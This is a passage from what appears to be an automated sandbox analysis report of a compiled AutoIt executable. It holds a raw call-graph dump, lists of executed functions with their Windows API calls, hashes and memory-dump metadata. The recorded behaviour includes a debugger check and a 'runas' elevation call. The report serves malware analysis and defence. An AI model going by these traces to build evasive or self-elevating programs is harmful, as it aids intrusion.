88321->88349 88324 4289e5 88352 45e737 90 API calls 3 library calls 88324->88352 88325 408e5a 88325->88066 88327 428a05 88330 408f40 VariantClear 88327->88330 88329 408dc9 88329->88324 88329->88325 88329->88327 88331 40a780 192 API calls 88329->88331 88332 408e64 88329->88332 88334 408f40 VariantClear 88329->88334 88350 40ba10 52 API calls 2 library calls 88329->88350 88330->88325 88331->88329 88333 408f40 VariantClear 88332->88333 88333->88325 88334->88329 88336 408f40 VariantClear 88335->88336 88337 403d20 88336->88337 88338 403cd0 VariantClear 88337->88338 88339 403d4d 88338->88339 88342 4013c0 52 API calls 88339->88342 88353 45e17d 88339->88353 88363 4755ad 88339->88363 88366 467897 88339->88366 88410 40de10 88339->88410 88415 46e91c 88339->88415 88340 403d76 88340->88063 88340->88073 88342->88340 88347->88063 88348->88065 88349->88329 88350->88329 88351->88324 88352->88327 88354 45e198 88353->88354 88355 45e19c 88354->88355 88356 45e1b8 88354->88356 88357 408f40 VariantClear 88355->88357 88358 45e1cc 88356->88358 88359 45e1db FindClose 88356->88359 88360 45e1a4 88357->88360 88362 45e1d9 ctype 88358->88362 88418 44ae3e 88358->88418 88359->88362 88360->88340 88362->88340 88431 475077 88363->88431 88365 4755c0 88365->88340 88367 4678bb 88366->88367 88395 467954 88367->88395 88547 45340c 85 API calls 88367->88547 88368 4115d7 52 API calls 88370 467989 88368->88370 88372 467995 88370->88372 88551 40da60 53 API calls 88370->88551 88371 4678f6 88373 413a0e __wsplitpath 46 API calls 88371->88373 88375 4533eb 85 API calls 88372->88375 88376 4678fc 88373->88376 88377 4679b7 88375->88377 88378 401b10 52 API calls 88376->88378 88535 40de40 88377->88535 88380 46790c 88378->88380 88548 40d200 52 API calls 2 library calls 88380->88548 88383 4679c7 GetLastError 88384 467a05 88387 467a2c 88384->88387 88388 467a4b 88384->88388 88385 467917 88385->88395 88549 4339fa GetFileAttributesW FindFirstFileW FindClose 88385->88549 88394 467928 88394->88395 88400 46792f 88394->88400 88395->88368 88396 467964 88395->88396 88396->88340 88550 4335cd 56 API calls 3 library calls 88400->88550 88406 467939 88406->88395 88408 408f40 VariantClear 88406->88408 88409 467947 88408->88409 88409->88395 88411 4115d7 52 API calls 88410->88411 88412 40de23 88411->88412 88413 40da20 CloseHandle 88412->88413 88414 40de2e 88413->88414 88414->88340 88565 46e785 88415->88565 88417 46e92f 88417->88340 88420 44ae4b ctype 88418->88420 88421 443fdf 88418->88421 88420->88362 88426 40da20 88421->88426 88423 443feb 88430 4340db CloseHandle ctype 88423->88430 88425 444001 88425->88420 88427 40da37 88426->88427 88428 40da29 88426->88428 88427->88428 88429 40da3c CloseHandle 88427->88429 88428->88423 88429->88423 88430->88425 88482 4533eb 88431->88482 88434 4750ee 88437 408f40 VariantClear 88434->88437 88435 475129 88486 4646e0 88435->88486 88442 4750f5 88437->88442 88438 47515e 88439 475162 88438->88439 88477 47518e 88438->88477 88440 408f40 VariantClear 88439->88440 88472 475169 88440->88472 88441 475357 88443 475365 88441->88443 88444 4754ea 88441->88444 88442->88365 88520 44b3ac 57 API calls 88443->88520 88526 464812 91 API calls 88444->88526 88448 4754fc 88449 475374 88448->88449 88451 475508 88448->88451 88499 430d31 88449->88499 88450 4533eb 85 API calls 88450->88477 88452 408f40 VariantClear 88451->88452 88455 47550f 88452->88455 88455->88472 88456 475388 88506 4577e9 88456->88506 88459 475480 88461 408f40 VariantClear 88459->88461 88461->88472 88469 4754b5 88470 408f40 VariantClear 88469->88470 88470->88472 88472->88365 88477->88441 88477->88450 88477->88459 88477->88469 88477->88477 88518 436299 52 API calls 2 library calls 88477->88518 88519 463ad5 64 API calls __wcsicoll 88477->88519 88483 453404 88482->88483 88484 4533f8 88482->88484 88483->88434 88483->88435 88484->88483 88529 4531b1 85 API calls 5 library calls 88484->88529 88530 4536f7 53 API calls 88486->88530 88488 4646fc 88531 4426cd 59 API calls _wcslen 88488->88531 88490 464711 88492 40bc70 52 API calls 88490->88492 88498 46474b 88490->88498 88493 46472c 88492->88493 88532 461465 52 API calls _memmove 88493->88532 88495 464741 88496 40c600 52 API calls 88495->88496 88496->88498 88497 464793 88497->88438 88498->88497 88533 463ad5 64 API calls __wcsicoll 88498->88533 88500 430db2 88499->88500 88501 430d54 88499->88501 88500->88456 88502 4115d7 52 API calls 88501->88502 88505 430d74 88502->88505 88518->88477 88519->88477 88520->88449 88526->88448 88529->88483 88530->88488 88531->88490 88532->88495 88533->88497 88536 40da20 CloseHandle 88535->88536 88537 40de4e 88536->88537 88553 40f110 88537->88553 88540 4264fa 88542 40de84 88562 40e080 SetFilePointerEx SetFilePointerEx 88542->88562 88544 40de8b 88563 40f160 SetFilePointerEx SetFilePointerEx WriteFile 88544->88563 88546 40de90 88546->88383 88546->88384 88547->88371 88548->88385 88549->88394 88550->88406 88551->88372 88554 40f125 CreateFileW 88553->88554 88555 42630c 88553->88555 88556 40de74 88554->88556 88555->88556 88557 426311 CreateFileW 88555->88557 88556->88540 88561 40dea0 55 API calls ctype 88556->88561 88557->88556 88558 426337 88557->88558 88564 40df90 SetFilePointerEx SetFilePointerEx 88558->88564 88560 426342 88560->88556 88561->88542 88562->88544 88563->88546 88564->88560 88566 46e7a2 88565->88566 88567 4115d7 52 API calls 88566->88567 88570 46e802 88566->88570 88568 46e7ad 88567->88568 88569 46e7b9 88568->88569 88613 40da60 53 API calls 88568->88613 88574 4533eb 85 API calls 88569->88574 88571 46e7e5 88570->88571 88578 46e82f 88570->88578 88572 408f40 VariantClear 88571->88572 88575 46e7ea 88572->88575 88576 46e7ca 88574->88576 88575->88417 88579 40de40 60 API calls 88576->88579 88577 46e8b5 88606 4680ed 88577->88606 88578->88577 88580 46e845 88578->88580 88581 46e7d7 88579->88581 88583 4533eb 85 API calls 88580->88583 88581->88578 88584 46e7db 88581->88584 88594 46e84b 88583->88594 88584->88571 88587 44ae3e CloseHandle 88584->88587 88585 46e8bb 88610 443fbe 88585->88610 88586 46e87a 88614 4689f4 59 API calls 88586->88614 88587->88571 88589 46e883 88592 4013c0 52 API calls 88589->88592 88593 46e88f 88592->88593 88596 40e0a0 52 API calls 88593->88596 88594->88586 88594->88589 88595 408f40 VariantClear 88604 46e881 88595->88604 88597 46e899 88596->88597 88615 40d200 52 API calls 2 library calls 88597->88615 88599 46e911 88599->88417 88600 46e8a5 88616 4689f4 59 API calls 88600->88616 88601 40da20 CloseHandle 88603 46e903 88601->88603 88605 44ae3e CloseHandle 88603->88605 88604->88599 88604->88601 88605->88599 88607 468100 88606->88607 88608 4680fa 88606->88608 88607->88585 88617 467ac4 88608->88617 88640 443e36 88610->88640 88612 443fd3 88612->88595 88612->88604 88613->88569 88614->88604 88615->88600 88616->88604 88618 467adc 88617->88618 88631 467bb8 88617->88631 88619 467c1d 88618->88619 88620 467c16 88618->88620 88621 467b90 88618->88621 88626 467aed 88618->88626 88623 4115d7 52 API calls 88619->88623 88639 40e270 VariantClear ctype 88620->88639 88624 4115d7 52 API calls 88621->88624 88625 467b75 _memmove 88623->88625 88624->88625 88629 4115d7 52 API calls 88625->88629 88627 467b28 ctype 88626->88627 88634 4115d7 52 API calls 88626->88634 88627->88619 88627->88625 88628 467b55 88627->88628 88630 4115d7 52 API calls 88628->88630 88629->88631 88632 467b5b 88630->88632 88631->88607 88637 442ee0 52 API calls 88632->88637 88634->88627 88635 467b6b 88638 45f645 54 API calls ctype 88635->88638 88637->88635 88638->88625 88639->88619 88643 443e19 88640->88643 88644 443e26 88643->88644 88645 443e32 WriteFile 88643->88645 88646 443db4 SetFilePointerEx SetFilePointerEx 88644->88646 88645->88612 88646->88645 88647->88084 88648->88176 88649->88097 88650->88145 88651->88209 88652->88145 88653->88145 88654->88114 88655->88142 88656->88108 88657->88112 88658->88116 88659->88179 88660->88179 88661->88179 88662->88133 88663->88152 88664->88135 88665->88167 88666->88187 88667->88187 88668->88176 88669->88191 88670->88206 88671->88197 88672->88204 88673->88212 88674->88212 88675->88152 88676->88102 88677 42d154 88681 480a8d 88677->88681 88679 42d161 88680 480a8d 192 API calls 88679->88680 88680->88679 88682 480ae4 88681->88682 88683 480b26 88681->88683 88685 480aeb 88682->88685 88686 480b15 88682->88686 88684 40bc70 52 API calls 88683->88684 88710 480b2e 88684->88710 88688 480aee 88685->88688 88689 480b04 88685->88689 88714 4805bf 192 API calls 88686->88714 88688->88683 88691 480af3 88688->88691 88713 47fea2 192 API calls __itow_s 88689->88713 88712 47f135 192 API calls 88691->88712 88693 40e0a0 52 API calls 88693->88710 88695 408f40 VariantClear 88697 481156 88695->88697 88696 480aff 88696->88695 88698 408f40 VariantClear 88697->88698 88699 48115e 88698->88699 88699->88679 88700 480ff5 88720 45e737 90 API calls 3 library calls 88700->88720 88701 40e710 53 API calls 88701->88710 88702 401980 53 API calls 88702->88710 88704 40c2c0 52 API calls 88704->88710 88705 408e80 VariantClear 88705->88710 88706 40a780 192 API calls 88706->88710 88710->88693 88710->88696 88710->88700 88710->88701 88710->88702 88710->88704 88710->88705 88710->88706 88715 45377f 52 API calls 88710->88715 88716 45e951 53 API calls 88710->88716 88717 40e830 53 API calls 88710->88717 88718 47925f 53 API calls 88710->88718 88719 47fcff 192 API calls 88710->88719 88712->88696 88713->88696 88714->88696 88715->88710 88716->88710 88717->88710 88718->88710 88719->88710 88720->88696 88721 42b14b 88728 40bc10 88721->88728 88723 42b159 88724 4096a0 329 API calls 88723->88724 88725 42b177 88724->88725 88739 44b92d VariantClear 88725->88739 88727 42bc5b 88729 40bc24 88728->88729 88730 40bc17 88728->88730 88731 40bc2a 88729->88731 88732 40bc3c 88729->88732 88733 408e80 VariantClear 88730->88733 88734 408e80 VariantClear 88731->88734 88735 4115d7 52 API calls 88732->88735 88736 40bc1f 88733->88736 88737 40bc33 88734->88737 88738 40bc43 88735->88738 88736->88723 88737->88723 88738->88723 88739->88727 88740 425b2b 88745 40f000 88740->88745 88744 425b3a 88746 4115d7 52 API calls 88745->88746 88747 40f007 88746->88747 88748 4276ea 88747->88748 88754 40f030 88747->88754 88753 41130a 51 API calls __cinit 88753->88744 88755 40f039 88754->88755 88756 40f01a 88754->88756 88784 41130a 51 API calls __cinit 88755->88784 88758 40e500 88756->88758 88759 40bc70 52 API calls 88758->88759 88760 40e515 GetVersionExW 88759->88760 88761 402160 52 API calls 88760->88761 88762 40e557 88761->88762 88785 40e660 88762->88785 88768 427674 88772 4276c6 GetSystemInfo 88768->88772 88770 40e5e0 88774 4276d5 GetSystemInfo 88770->88774 88799 40efd0 88770->88799 88771 40e5cd GetCurrentProcess 88806 40ef20 LoadLibraryA GetProcAddress 88771->88806 88772->88774 88777 40e629 88803 40ef90 88777->88803 88780 40e641 FreeLibrary 88781 40e644 88780->88781 88782 40e653 FreeLibrary 88781->88782 88783 40e656 88781->88783 88782->88783 88783->88753 88784->88756 88786 40e667 88785->88786 88787 42761d 88786->88787 88788 40c600 52 API calls 88786->88788 88789 40e55c 88788->88789 88790 40e680 88789->88790 88791 40e687 88790->88791 88792 427616 88791->88792 88793 40c600 52 API calls 88791->88793 88794 40e566 88793->88794 88794->88768 88795 40ef60 88794->88795 88796 40e5c8 88795->88796 88797 40ef66 LoadLibraryA 88795->88797 88796->88770 88796->88771 88797->88796 88798 40ef77 GetProcAddress 88797->88798 88798->88796 88800 40e620 88799->88800 88801 40efd6 LoadLibraryA 88799->88801 88800->88772 88800->88777 88801->88800 88802 40efe7 GetProcAddress 88801->88802 88802->88800 88807 40efb0 LoadLibraryA GetProcAddress 88803->88807 88805 40e632 GetNativeSystemInfo 88805->88780 88805->88781 88806->88770 88807->88805 88808 425b5e 88813 40c7f0 88808->88813 88812 425b6d 88848 40db10 52 API calls 88813->88848 88815 40c82a 88849 410ab0 6 API calls 88815->88849 88817 40c86d 88818 40bc70 52 API calls 88817->88818 88819 40c877 88818->88819 88820 40bc70 52 API calls 88819->88820 88821 40c881 88820->88821 88822 40bc70 52 API calls 88821->88822 88823 40c88b 88822->88823 88824 40bc70 52 API calls 88823->88824 88825 40c8d1 88824->88825 88826 40bc70 52 API calls 88825->88826 88827 40c991 88826->88827 88850 40d2c0 52 API calls 88827->88850 88829 40c99b 88851 40d0d0 53 API calls 88829->88851 88831 40c9c1 88832 40bc70 52 API calls 88831->88832 88833 40c9cb 88832->88833 88852 40e310 53 API calls 88833->88852 88835 40ca28 88836 408f40 VariantClear 88835->88836 88837 40ca30 88836->88837 88838 408f40 VariantClear 88837->88838 88839 40ca38 GetStdHandle 88838->88839 88840 429630 88839->88840 88841 40ca87 88839->88841 88840->88841 88842 429639 88840->88842 88847 41130a 51 API calls __cinit 88841->88847 88853 4432c0 57 API calls 88842->88853 88844 429641 88854 44b6ab CreateThread 88844->88854 88846 42964f CloseHandle 88846->88841 88847->88812 88848->88815 88849->88817 88850->88829 88851->88831 88852->88835 88853->88844 88854->88846 88855 44b5cb 58 API calls 88854->88855 88856 425b6f 88861 40dc90 88856->88861 88860 425b7e 88862 40bc70 52 API calls 88861->88862 88863 40dd03 88862->88863 88869 40f210 88863->88869 88866 40dd96 88867 40ddb7 88866->88867 88872 40dc00 52 API calls 2 library calls 88866->88872 88868 41130a 51 API calls __cinit 88867->88868 88868->88860 88873 40f250 RegOpenKeyExW 88869->88873 88871 40f230 88871->88866 88872->88866 88874 425e17 88873->88874 88875 40f275 RegQueryValueExW 88873->88875 88874->88871 88876 40f2c3 RegCloseKey 88875->88876 88877 40f298 88875->88877 88876->88871 88878 40f2a9 RegCloseKey 88877->88878 88879 425e1d 88877->88879 88878->88871

                                                                                              Executed Functions

                                                                                              Function 004096A0 Relevance: 33.9, APIs: 21, Instructions: 2413COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 004096C1
                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                              • _memmove.LIBCMT ref: 0040970C
                                                                                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                                              • _memmove.LIBCMT ref: 00409D96
                                                                                              • _memmove.LIBCMT ref: 0040A6C4
                                                                                              • _memmove.LIBCMT ref: 004297E5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2383988440-0
                                                                                              • Opcode ID: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                                                                                              • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                                              • Opcode Fuzzy Hash: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                                                                                              • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                                                                                              Function 0040D590 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144windowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                                                • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                                                • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                                                                • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                                                                • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                                                                • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                                                                • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                                              • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                                                • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                                              • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                                              • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                                              • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                                                • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                              Strings
                                                                                              • runas, xrefs: 0042E2AD, 0042E2DC
                                                                                              • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                                              • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                              • API String ID: 2495805114-3383388033
                                                                                              • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                                              • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                                              • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                                              • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                                                                                              Function 0040E500 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1904 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1913 40e582-40e583 1904->1913 1914 427674-427679 1904->1914 1917 40e585-40e596 1913->1917 1918 40e5ba-40e5cb call 40ef60 1913->1918 1915 427683-427686 1914->1915 1916 42767b-427681 1914->1916 1920 427693-427696 1915->1920 1921 427688-427691 1915->1921 1919 4276b4-4276be 1916->1919 1922 427625-427629 1917->1922 1923 40e59c-40e59f 1917->1923 1935 40e5ec-40e60c 1918->1935 1936 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1918->1936 1937 4276c6-4276ca GetSystemInfo 1919->1937 1920->1919 1927 427698-4276a8 1920->1927 1921->1919 1929 427636-427640 1922->1929 1930 42762b-427631 1922->1930 1925 40e5a5-40e5ae 1923->1925 1926 427654-427657 1923->1926 1931 40e5b4 1925->1931 1932 427645-42764f 1925->1932 1926->1918 1938 42765d-42766f 1926->1938 1933 4276b0 1927->1933 1934 4276aa-4276ae 1927->1934 1929->1918 1930->1918 1931->1918 1932->1918 1933->1919 1934->1919 1940 40e612-40e623 call 40efd0 1935->1940 1941 4276d5-4276df GetSystemInfo 1935->1941 1936->1935 1948 40e5e8 1936->1948 1937->1941 1938->1918 1940->1937 1945 40e629-40e63f call 40ef90 GetNativeSystemInfo 1940->1945 1950 40e641-40e642 FreeLibrary 1945->1950 1951 40e644-40e651 1945->1951 1948->1935 1950->1951 1952 40e653-40e654 FreeLibrary 1951->1952 1953 40e656-40e65d 1951->1953 1952->1953
                                                                                              APIs
                                                                                              • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                                              • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                                              • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                                              • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                                              • String ID: 0SH$Wu
                                                                                              • API String ID: 3363477735-1135818761
                                                                                              • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                              • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                                              • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                              • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                                              Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                                              • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: IsThemeActive$uxtheme.dll
                                                                                              • API String ID: 2574300362-3542929980
                                                                                              • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                              • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                                              • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                              • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                                                              Function 0040D6B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                                                              • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeInfoLibraryParametersSystem
                                                                                              • String ID: Wu
                                                                                              • API String ID: 3403648963-4083010176
                                                                                              • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                              • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                                              • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                              • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                                              Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
